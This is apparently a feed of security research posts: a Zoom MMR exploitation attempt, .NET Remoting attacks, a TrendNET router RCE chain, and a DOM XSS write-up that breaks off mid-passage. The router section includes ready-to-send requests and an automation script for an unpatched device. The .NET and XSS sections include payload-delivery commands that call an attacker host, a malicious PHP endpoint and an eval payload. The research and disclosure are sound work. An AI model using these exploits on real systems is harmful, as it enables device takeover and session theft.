The vulnerability was assigned CVE-2021-34424 and fixed on November 24, 2021. I tested it on my own MMR as well as Zoom’s public MMR, and it worked and returned pointer data in both cases.

Exploit Attempt

I attempted to exploit my local MMR server with these vulnerabilities, and while I had success with portions of the exploit, I was not able to get it working. I started off by investigating the possibility of creating a client that could trigger each bug outside of the Zoom client, but client authentication appeared complex and I lacked symbols for this part of the code, so I didn’t pursue this as I suspected it would be very time-consuming. Instead, I analyzed the exploitability of the bugs by triggering them from a Linux Zoom client hooked with Frida.

I started off by investigating the impact of heap corruption on the MMR process. MMR servers run on CentOS 7, which uses a modern glibc heap, so exploiting heap unlinking did not seem promising. I looked into overwriting the vtable of a C++ object allocated on the heap instead.


I wrote several Frida scripts that hooked malloc on the server, and used them to monitor how incoming traffic affects allocation. It turned out that there are not many ways for an attacker to control memory allocation on an MMR server that are useful for exploiting this vulnerability. There are several packet types that an attacker can send to the server that cause memory to be allocated on the heap and then freed when processing is finished, but not as many where the attacker can trigger both allocation and freeing. Moreover, the MMR server performs different types of processing in separate threads that use unique heap arenas, so many areas of the code where this type of allocation is likely to occur, such as connection management, allocate memory in a different heap arena than the thread where the bug occurs. The only such allocations I could find that were made in the same arena were related to meeting set-up: when a user joins a meeting, certain objects are allocated on the heap, which are then freed when they leave the meeting. Unfortunately, these allocations are difficult to automate as they require many unique users accounts in order for the allocation to be performed repeatedly, and allocation takes an observable amount of time (seconds).

I eventually wrote Frida scripts that looked for free chunks of unusual sizes that bordered C++ objects with vtables during normal MMR operation. There were a few allocation sizes that met this criteria, and since CVE-2021-34423 allows for the size of the buffer that is overflowed to be specified by the attacker, I was able to corrupt the memory of the adjacent object. Unfortunately, heap verification was very robust, so in most cases, the MMR process would crash due to a heap verification error before a virtual call was made on the corrupted object. I eventually got around this by focusing on allocation sizes that are small enough to be stored in fastbins by the heap, as heap chunks that are stored in fastbins do not contain verifiable heap metadata. Chunks of size 58 turned out to be the best choice, and by triggering the bug with an allocation of that size, I was able to control the pointer of a virtual call about one in ten times I triggered the bug.

The next step was to figure out where to point the pointer I could control, and this turned out to be more challenging than I expected. The MMR process did not have ASLR enabled when I did this research (it was enabled in version 4.6.20211128.136, which was released on November 28, 2021), so I was hoping to find a series of locations in the binary that this call could be directed to that would eventually end in a call to execv with controllable parameters, as the MMR initialization code contains many calls to this function. However, there were a few features of the server that made this difficult. First, only the MMR binary was loaded at a fixed location. The heap and system libraries were not, so only the actual MMR code was available without bypassing ASLR. Second, if the MMR crashes, it has an exponential backoff which culminates in it respawning every hour on the hour. This limits how many exploit attempts an attacker has. It is realistic that an attacker might spend days or even weeks trying to exploit a server, but this still limits them to hundreds of attempts. This means that any exploit of an MMR server would need to be at least somewhat reliable, so certain techniques that require a lot of attempts, such as allocating a large buffer on the heap and trying to guess its location were not practical.

I eventually decided that it would be helpful to allocate a buffer on the heap with controlled contents and determine its location. This would make the exploit fairly reliable in the case that the overflow successfully leads to a virtual call, as the buffer could be used as a fake vtable, and also contain strings that could be used as parameters to execv. I tried using CVE-2021-34424 to leak such an address, but wasn’t able to get this working.

This bug allows the attacker to provide a string of any size, which then gets copied out of bounds up until a null character is encountered in memory, and then returned. It is possible for CVE-2021-34424 to return a heap pointer, as the MMR maps the heap that gets corrupted at a low address that does not usually contain null bytes, however, I could not find a way to force a specific heap pointer to be allocated next to the string buffer that gets copied out of bounds. C++ objects used by the MMR tend to be virtual objects, so the first 64 bits of most object allocations are a vtable which contains null bytes, ending the copy. Other allocated structures, especially larger ones, tend to contain non-pointer data. I was able to get this bug to return heap pointers by specifying a string that was less than 64 bits long, so the nearby allocations were sometimes the pointers themselves, but allocations of this size are so frequent it was not possible to ascertain what heap data they pointed to with any accuracy.

One last idea I had was to use another type confusion bug to leak a pointer to a controllable buffer. There is one such bug in the processing of deserialized ssb::kv_update_req objects. This object’s ssb::dyna_para_table_t table contains a variant named nodeid which represents the specific Zoom client that the message refers to. If an attacker changes this variant to be of type array instead of a 32-bit integer, the address of the pointer to this array will be logged as a string. I tried to combine CVE-2021-34424 with this bug, hoping that it might be possible for the leaked data to be this log string that contains pointer information. Unfortunately, I wasn’t able to get this to work because of timing: the log entry needs to be logged at almost exactly the same time as the bug is triggered so that the log data is still in memory, and I wasn't able to send packets fast enough. I suspect it might be possible for this to work with improved automation, as I was relying on clients hooked with Frida and browsers to interact with the Zoom server, but I decided not to pursue this as it would require tooling that would take substantial effort to develop.

Conclusion

I performed a security analysis of Zoom and reported two vulnerabilities. One was a buffer overflow that affected both Zoom clients and MMR servers, and one was an info leak that is only useful to attackers on MMR servers. Both of these vulnerabilities were fixed on November 24, 2021.

The vulnerabilities in Zoom’s MMR server are especially concerning, as this server processes meeting audio and video content, so a compromise could allow an attacker to monitor any Zoom meetings that do not have end-to-end encryption enabled. While I was not successful in exploiting these vulnerabilities, I was able to use them to perform many elements of exploitation, and I believe that an attacker would be able to exploit them with sufficient investment. The lack of ASLR in the Zoom MMR process greatly increased the risk that an attacker could compromise it, and it is positive that Zoom has recently enabled it. That said, if vulnerabilities similar to the ones that I reported still exist in the MMR server, it is likely that an attacker could bypass it, so it is also important that Zoom continue to improve the robustness of the MMR code.

It is also important to note that this research was possible because Zoom allows customers to set up their own servers, meanwhile no other video conferencing solution with proprietary servers that I have investigated allows this, so it is unclear how these results compare to other video conferencing platforms.

Overall, while the client bugs that were discovered during this research were comparable to what Project Zero has found in other videoconferencing platforms, the server bugs were surprising, especially when the server lacked ASLR and supports modes of operation that are not end-to-end encrypted.

There are a few factors that commonly lead to security problems in videoconferencing applications that contributed to these bugs in Zoom. One is the huge amount of code included in Zoom. There were large portions of code that I couldn’t determine the functionality of, and many of the classes that could be deserialized didn’t appear to be commonly used. This both increases the difficulty of security research and increases the attack surface by making more code that could potentially contain vulnerabilities available to attackers. In addition, Zoom uses many proprietary formats and protocols which meant that understanding the attack surface of the platform and creating the tooling to manipulate specific interfaces was very time consuming. Using the features we tested also required paying roughly $1500 USD in licensing fees. These barriers to security research likely mean that Zoom is not investigated as often as it could be, potentially leading to simple bugs going undiscovered.  

Still, my largest concern in this assessment was the lack of ASLR in the Zoom MMR server. ASLR is arguably the most important mitigation in preventing exploitation of memory corruption, and most other mitigations rely on it on some level to be effective. There is no good reason for it to be disabled in the vast majority of software. There has recently been a push to reduce the susceptibility of software to memory corruption vulnerabilities by moving to memory-safe languages and implementing enhanced memory mitigations, but this relies on vendors using the security measures provided by the platforms they write software for. All software written for platforms that support ASLR should have it (and other basic memory mitigations) enabled.

The closed nature of Zoom also impacted this analysis greatly. Most video conferencing systems use open-source software, either WebRTC or PJSIP. While these platforms are not free of problems, it’s easier for researchers, customers and vendors alike to verify their security properties and understand the risk they present because they are open. Closed-source software presents unique security challenges, and Zoom could do more to make their platform accessible to security researchers and others who wish to evaluate it. While the Zoom Security Team helped me access and configure server software, it is not clear that support is available to other researchers, and licensing the software was still expensive. Zoom, and other companies that produce closed-source security-sensitive software should consider how to make their software accessible to security researchers.

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and, not just for that reason, a promising target to watch.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internals of .NET Remoting, you may skip the introduction and proceed right to Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so-called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.

And although .NET Remoting had already been deprecated with the release of .NET Framework 3.0 in 2006 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSink → SdlChannelSink → SoapServerFormatterSink → BinaryServerFormatterSink → DispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSink → BinaryServerFormatterSink → SoapServerFormatterSink → DispatchChannelSink

On the client side, the sink chain looks similar but in reversed order: first a formatter sink and finally the transport sink.

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.

Passing Parameters and Return Values

Parameter values and return values can be transfered in two ways:

  • by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
  • by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server’s registry and return an ObjRef instance that holds the URL and type information of the marshaled object.

The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows customizing the serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means that every remoting object extending MarshalByRefObject is substituted with an ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw.

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

.NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:

Authentication
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: secure=bool channel property; ISecurableChannel.IsSecured (via NegotiateStream; default: false)

Authorization
  • HTTP Channel: n/a
  • IPC Channel: authorizationGroups=Windows/AD Group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied); CommonSecurityDescriptor passed to an IpcServerChannel constructor
  • TCP Channel: custom IAuthorizeRemotingConnection class (authorizationModule channel property or passed to the TcpServerChannel constructor)

Impersonation
  • HTTP Channel: n/a
  • IPC Channel: impersonate=bool (default: false)
  • TCP Channel: impersonate=bool (default: false)

Confidentiality, Integrity, and Authentication Protection
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: protectionLevel={None, Sign, EncryptAndSign} channel property

Interface Binding
  • HTTP Channel: n/a
  • IPC Channel: n/a
  • TCP Channel: rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to the named pipes created by the IPC server channel is denied to the NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, when authorizationGroup is used, this network restriction is not in place, so the group that is allowed to access the named pipe may also do so remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to log on with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, a tool for attacking .NET Remoting services via IPC/TCP using various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all other commands (see -h)
Write a FakeAsm assembly to the server's file system and load a type from it to register it at the server; it is then accessible via the existing .NET Remoting channel and can perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This makes it possible to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which the victim's server calls remotely on the attacker's server. As for the key, a FileInfo/DirectoryInfo object is wrapped in a SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference, so the attacker ends up with a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with a MarshalByRefObject object as parameter to make the server call IConvertible.ToType(Type, IFormatProvider) on an object on the attacker's server, which can then deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overridden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized to any method accepting a parameter. That is why we have added the --useobjref option to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IFormatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If custom errors are disabled and a RemotingException gets returned by the server, the following may help to identify the cause and find a solution:

"Requested Service not found"
  • Reason: the URI of an existing remoting service must be known; there is no way to iterate them.
  • ExampleRemotingService options: n/a
  • ExploitRemotingService bypass options: --nulluri may work if the remoting service has not been servicing any requests yet.

NotSupportedException with link to KB 390633
  • Reason: received IMessage objects are disallowed from being MarshalByRefObject (see AppSettings.AllowTransparentProxyMessage).
  • ExampleRemotingService options: -d
  • ExploitRemotingService bypass options: --uselease, --useobjref

SecurityException with PermissionSet info
  • Reason: Code Access Security (CAS) restricted permissions are in place (TypeFilterLevel.Low).
  • ExampleRemotingService options: -t low
  • ExploitRemotingService bypass options: --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to it that we think are worthwhile:

--useobjref option
This newly added option makes it possible to use the ObjRef trick described above.
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers this and avoids trying to load the assembly again. That means writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is finding the proper location to write the assembly to where the runtime will search for it (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname option to name the FakeAsm assembly, so that it is possible to make multiple attempts at writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
  > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting was deprecated a long time ago for obvious reasons. If you are a developer, don't use it; migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we recommend the excellent ExploitRemotingService by James Forshaw, which works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try the enhancements added to our fork of ExploitRemotingService; especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of these devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement: all of its services are exposed via the WAN interface by default. Unfortunately for us, however, they're exposed only via IPv6. Due to an oversight in the default firewall rules for the device, no restrictions are applied to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt the syslog configuration file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier to entry in discovering these devices, we don't expect widespread exploitation. That said, it's a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.
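To illustrate how little automation is needed, here is a minimal sketch in JavaScript (Node.js 18+ with the global fetch API). The target address is a placeholder, the reboot between steps 2 and 3 is assumed to be triggered separately as described above, and the request bodies are taken verbatim from the requests shown earlier.

// Hypothetical automation of the chain described above (illustrative only)
const target = "http://[REDACTED]"; // placeholder: the device's WAN address
const form = { "Content-Type": "application/x-www-form-urlencoded" };

async function exploit() {
    // Step 1: reset the admin password via the hidden tools_admin_elecom action
    await fetch(`${target}/apply_sec.cgi`, {
        method: "POST",
        headers: form,
        body: "ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value" +
            "&html_response_return_page=dummy_value&method=tools&admin_password=testing123",
    });

    // Step 2: corrupt the syslog config and plant the injected command (telnetd)
    await fetch(`${target}/apply.cgi`, {
        method: "POST",
        headers: form,
        body: "ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog" +
            "&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b" +
            "&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1" +
            "&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1",
    });

    // Step 3: after the device has been rebooted (web interface or manual
    // request), visit the syslog page to trigger the vulnerable system() call
    await fetch(`${target}/adm_syslog.asp`);
}

exploit();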


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked whether the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters, since the message can be sent from any attacker-controlled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production", window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com'. This URL would then be used in a POST request, and the response would be parsed as JSON and assigned to window.settingsSync. Next, window.settingsSync.versionNumber was used to construct the URL of a new JavaScript file to load: var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled location that could serve a malicious response to the POST request.
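The rearrangement is easy to reproduce in isolation by running the vulnerable snippet's logic on the malicious region value:

const region = ".my.website/malicious.php?_bad";
const subdomain = region.split("_")[1] + '-' + region.split("_")[0];
const domain = 'https://' + subdomain + '.settingsSync.com';
console.log(domain); // https://bad-.my.website/malicious.php?.settingsSync.com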

Diagram 1

I created malicious.php on my server to return a valid response, modelled on responses captured from the origin target, with the name of the selected config changed to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!
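Put together, the attacker page looked something like this (a minimal sketch; the delay and exact payload shape are assumptions):

// Hypothetical attacker page: open the page embedding the vulnerable iFrame,
// then message the iFrame once it has had time to load
var child = window.open("https://feedback.companyA.com/");
setTimeout(function () {
    child.frames[1].postMessage({
        type: "ChatSettings",
        iframeChatSettings: {
            environment: "production",
            region: ".my.website/malicious.php?_bad"
        }
    }, "*");
}, 5000);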

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

